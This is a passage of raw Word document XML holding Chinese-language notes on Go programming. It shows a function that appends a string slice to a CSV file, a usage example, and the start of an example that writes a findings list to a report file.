    <w:p w14:paraId="6C2EEE19" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>writer := csv.NewWriter(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F712B3E" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer writer.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1394D499" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FACBAB6" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>写入数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3083BCBF" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>err = writer.Write(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECC30D" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03B77E" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA33A96" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B4FDB" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61034359" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B8F6A" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9A66E" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C72AA65" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个函数中，我们首先打开（或创建）一个文件，准备将数据追加到文件的末尾。然后，我们创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSV writer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并使用它将切片的内容写入到文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FFB5C3" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DECE836" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.OpenFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>函数使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.O_WRONLY</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.O_CREATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.O_APPEND</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标志，这意味着文件将被打开以供写入，如果文件不存在则将创建一个新文件，如果文件已经存在，数据将被追加到文件的末尾。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24952873" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093D8C89" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，以上代码没有做任何输入检查，因此在实际使用中你可能需要增加更多的错误检查和处理逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945258F" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBEA4DC" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数接受两个参数：一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的数据和一个文件名。你可以这样使用这个函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F77519B" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F82A975" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABDAF9" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>data := []string{"abc", "123456", "PASS"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC6AC1" w14:textId="7B8BDF93" w:rsidR="00FA1227" w:rsidRPr="005D25EE" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D25EE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>err := appendToCSV(data, "data.csv")</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或者直接用</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE" w:rsidRPr="005D25EE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>appendToCSV([]string{s, fmt.Sprintf("%f", upAndDownRateValue)}, "UpDownTest.csv")</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>也可以，不需要</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r w:rsidR="005D25EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这种还得处理个错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F986852" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6F585" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Error:", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65C029" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989E4B9" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18628C" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Data appended successfully.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148990CB" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C848001" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F22F1E3" w14:textId="022F926A" w:rsidR="00480CEC" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这将会把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切片中的数据追加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。如果有任何错误发生，它将会被打印出来。如果一切顺利，你会看到一条表示成功的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C27DAE5" w14:textId="77777777" w:rsidR="00480CEC" w:rsidRDefault="00480CEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797E25B0" w14:textId="77777777" w:rsidR="00480CEC" w:rsidRDefault="00480CEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBD6946" w14:textId="3CD07F77" w:rsidR="00480CEC" w:rsidRPr="00480CEC" w:rsidRDefault="00480CEC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5F4F9" w14:textId="2BC29D2F" w:rsidR="00240234" w:rsidRDefault="00240234" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA603C9" w14:textId="77777777" w:rsidR="00240234" w:rsidRDefault="00240234" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>os</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(reportPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662626A2" w14:textId="77777777" w:rsidR="00240234" w:rsidRDefault="00240234" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>writeCsv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A4438" w14:textId="77777777" w:rsidR="00240234" w:rsidRPr="00240234" w:rsidRDefault="00240234" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADFEE24" w14:textId="653FCD59" w:rsidR="00240234" w:rsidRPr="00240234" w:rsidRDefault="00225D81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writeCsv(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02904623" w14:textId="77777777" w:rsidR="009800D6" w:rsidRPr="009800D6" w:rsidRDefault="009800D6" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A1A1A1"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>writeCsv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes the list of findings to a writeCloser.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>writeCsv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(f []</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
